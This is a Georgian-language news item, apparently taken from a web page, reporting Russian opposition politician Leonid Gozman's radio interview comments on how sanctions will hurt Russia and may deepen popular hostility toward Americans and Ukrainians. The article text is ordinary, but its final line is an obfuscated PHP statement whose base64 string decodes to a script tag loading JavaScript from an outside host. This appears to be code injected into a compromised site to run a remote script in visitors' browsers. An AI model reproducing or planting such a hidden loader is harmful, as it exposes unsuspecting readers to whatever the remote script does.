celsiusi
ავერსი შნაიდერი
ობიექტურად, ეს სანქციები რუსეთისთვის საშინელებაა, მიუხედავად იმისა, რომ პუტინი შიდა აუდიტორიისთვის აცხადებს, რომ სანქციები მხოლოდ გაგვაძლიერებს – ამის შესახებ, რადიო "მაესტროსთან" ინტერვიუში, რუსეთ–უკრაინის ომზე საუბრისას  რუსმა ოპოზიციონერმა პოლიტიკოსმა ლეონიდ გოზმანმა განაცხადა.  
 
მისივე თქმით, სანქციების სიმძიმეს ძალიან ბევრი ადამიანი იგრძნობს, მაგრამ როგორც თუ ამის შეგრძნებას დაიწყებენ ადამიანები, კიდევ უფრო მეტად შეიძულებენ ამერიკელებს, უკრაინელებს და სხვებს მათთან ერთად.
 
"ობიექტურად, ეს სანქციები რუსეთისთვის საშინელებაა, მიუხედავად იმისა, რომ პუტინი შიდა აუდიტორიისთვის აცხადებს, რომ სანქციები მხოლოდ გაგვაძლიერებს, ამის პარალელურად მან რამდენიმე შეთავაზება გააკეთა სანქციების მოხსნის სანაცვლოდ. ეს კი იმაზე მიუთითებს, რომ სანქციები ძალიან სერიოზულია. რამდენად გრძნობენ ამას ადამიანები, ჯერ-ჯერობით ადამიანები არც თუ ისე ძლიერად გრძნობენ ამას. თქვენ იცით, რუსეთში საბაზრო ეკონომიკაა, შესაბამისად, ამ ტიპის ეკონომიკაში შიმშილობა თითქმის არ არსებობს ან ძალიან იშვიათად ხდება. საბაზრო ეკონომიკის მექანიზმების არსებობის წყალობით, შესაძლებელია ადაპტირება ძალიან მძიმე მოვლენებისთვის. მიუხედავად ამისა, იხურებიან საერთაშორისო კომპანიები. წინ გველოდება დეფიციტი სათადარიგო ნაწილების, რომლის ექსპორტი ხდებოდა და რუსეთში არ იყიდება. რუსეთის მოქალაქეებისთვის სამწუხაროდ, ტექნოლოგიურადაც ჩვენი ქვეყანა არ მიიჩნევა მოწინავედ, რაც იმას ნიშნავს, რომ კომპიუტერები, ტელეფონები, სამედიცინო მოწყობილობები და კიდევ ბევრი რამ იმპორტირებულია. ჩვენ ამ ყველაფერს ნავთობზე, გაზზე ვცლიდით. ეს, რა თქმა უნდა, შესაძლებელი იყო, მაგრამ  არ შეიძლება იმათთან ჩხუბი, ვინც გაწვდის ამ ყველაფერს. საჭიროა აზროვნება! რას გავაკეთებთ ავტომობილების, კომპიუტერების წარმოების მიმართულებით, პროგრამების განახლების თვალსაზრისით, მე არ ვიცი, შესაბამისად, წინ ძალიან რთული პერიოდი გველოდება! ამის სიმძიმეს ძალიან ბევრი ადამიანი იგრძნობს, მაგრამ როგორც თუ ამის შეგრძნებას დაიწყებენ ადამიანები, კიდევ უფრო მეტად შეიძულებენ ამერიკელებს, უკრაინელებს და სხვებს მათთან ერთად,  შეიძლება ქართველებიც კი, მხოლოდ ამის შემდეგ შეიძლება საკუთარი მთავრობის მიმართ გამოხატონ უკმაყოფილება."– განაცხადა გოზმანმა. 
 
ინტერვიუს სრული ვერსიის ნახვა შესაძლებელია აქ 
1006
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");